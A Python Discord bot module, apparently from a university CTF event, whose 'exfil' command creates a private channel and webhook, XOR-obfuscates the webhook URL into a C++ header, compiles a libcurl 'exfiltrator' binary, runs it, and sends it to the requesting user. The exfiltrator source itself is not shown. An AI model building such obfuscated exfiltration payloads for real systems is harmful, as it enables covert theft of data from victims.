"""
Hiveling cog, handles all hiveling tasks
"""
import os
import random
import logging
from distutils.dir_util import copy_tree

import discord
from discord.ext import commands
from discord.ext.commands import Context

alphabet = ["Alpha", "Bravo", "Charlie", "Delta", "Echo", "Foxtrot", "Golf", "Hotel", "India", "Juliett", "Kilo",
            "Lima", "Mike", "November", "Oscar", "Papa", "Quebec", "Romeo", "Sierra", "Tango", "Uniform", "Victor",
            "Whiskey", "Xray", "Yankee", "Zulu"]


class Hiveling(commands.Cog, name="hiveling"):
    def __init__(self, bot) -> None:
        self.bot = bot

    @commands.command(
        name="info",
        description="The description of my command",
    )
    async def get_info(self, ctx: Context) -> None:
        """
        Sends general info about the hivemind

        :param context: The application command context.
        """
        guild = self.bot.get_guild(self.bot.config["server_id"])
        embed_message = discord.Embed(title="Information", description="", color=0x00ff00)
        embed_message.add_field(name="Username", value=self.bot.user.name, inline=False)
        embed_message.add_field(name="User ID", value=self.bot.user.id, inline=False)
        embed_message.add_field(name="Discord.py version", value=discord.__version__, inline=False)
        embed_message.add_field(name="Hive size", value=len(guild.members), inline=False)
        embed_message.add_field(name="Source code", value="https://github.com/StudSec/VUCTF24-Bot", inline=False)
        await ctx.send(embed=embed_message)

    @commands.command(
        name="exfil",
        description="Establish exfiltration channel.",
    )
    async def setup_exfiltration(self, ctx: Context) -> None:
        """
        Setup exfiltration channel and payload for a hiveling.

        :param context: The command context.
        """

        # Create channel
        guild = self.bot.get_guild(self.bot.config["server_id"])
        category = discord.utils.get(guild.categories, name="Exfiltration-channels")
        if category is None:
            category = await guild.create_category("Exfiltration-channels")

        name = '-'.join([random.choice(alphabet) for _ in range(3)])
        while True:
            channel = discord.utils.get(category.channels, name=name)
            if channel is None:
                try:
                    overwrites = {
                        guild.default_role: discord.PermissionOverwrite(read_messages=False)
                    }
                    exfil_channel = await category.create_text_channel(name, overwrites=overwrites)
                    webhook = await exfil_channel.create_webhook(name="Hiveling")
                    break
                except Exception:  # We reached the max channels
                    await category.edit(name="Exfil-" + '-'.join([random.choice(alphabet) for _ in range(4)]))
                    category = await guild.create_category("Exfiltration-channels")
            else:
                name = '-'.join([random.choice(alphabet) for _ in range(3)])

        source = "./bot/data/source/"
        destination = f"./bot/data/{name}/"
        copy_tree(source, destination)

        encrypted_url = '{'
        key = 'thehivemustgrow'
        for i in range(len(webhook.url)):
            encrypted_url += "0x" + hex(ord(webhook.url[i]) ^ ord(key[i % len(key)]))[2:] + ", "
        encrypted_url += "}"

        with open(f"{destination}/exfiltrator.h", "w") as f:
            f.write(f"""#ifndef CONFIG_H
#define CONFIG_H

const int URL_LENGTH = {len(webhook.url)};
const unsigned char ENCRYPTED_URL[] = {encrypted_url};

#endif // CONFIG_H
""")
        os.system(f"g++ {destination}/exfiltrator.cpp -o {destination}/exfil.bin -lcurl")
        os.system(f"{destination}/exfil.bin")
        logging.info(webhook.url)
        try:
            with open(f"{destination}/exfil.bin", 'rb') as file:
                await ctx.author.send("Exfiltration package created, happy hunting.", file=discord.File(file,
                                                                                           filename='exfil.bin'))
                return
        except FileNotFoundError:
            await ctx.author.send(f"Failed to create exfiltration package, webhook url at: {webhook.url}")


async def setup(bot) -> None:  # pylint: disable=missing-function-docstring
    await bot.add_cog(Hiveling(bot))
